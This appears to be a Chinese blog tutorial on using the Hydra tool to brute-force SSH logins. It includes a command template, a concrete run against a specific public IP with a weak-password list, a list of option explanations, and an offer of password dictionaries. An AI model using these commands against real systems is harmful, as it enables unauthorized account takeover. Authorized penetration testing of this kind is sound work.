hydra(thc hydra)是一个在线密码攻击工具。支持Linux、Windows、Mac平台安装它在telnet、ssh、http、https、smb、snmp、smtp等实时服务上强制各种组合。由于Kali Linux中自带Hydra,我这边就不介绍怎么安装Hydra,有需要的可以百度下,很容易找到,下面直接讲如何用它。
下面以示例演示下SSH 暴 力登录:
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
root# hydra -l root -P /root/桌面/weakpass/top500_pass.txt -t 2 -vV -e ns 36.137.21.162 ssh
参数:
-l login 小写,指定用户名进行破解
-L file 大写,指定用户的用户名字典
-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。
-P file 大写,用于指定密码字典。
-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
-M file 指定目标ip列表文件,批量破解。
-o file 指定结果输出文件
-f 找到第一对登录名或者密码的时候中止破解。
-t tasks 同时运行的线程数,默认是16
-w time 设置最大超时时间,单位
-v / -V 显示详细过程
-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续完成任务。)
-x 自定义密码。
破解成功,会直接显示结果。
******密码本需要自己收集,有需要的话我这边也有网上大佬收集很全的密码本,需要的可以自行下载,喜欢我的帖子记得点赞收藏:
页面更新:2024-03-23
本站资料均由网友自行发布提供,仅用于学习交流。如有版权问题,请与我联系,QQ:4156828
© CopyRight 2020-2024 All Rights Reserved. Powered By 71396.com 闽ICP备11008920号-4
闽公网安备35020302034903号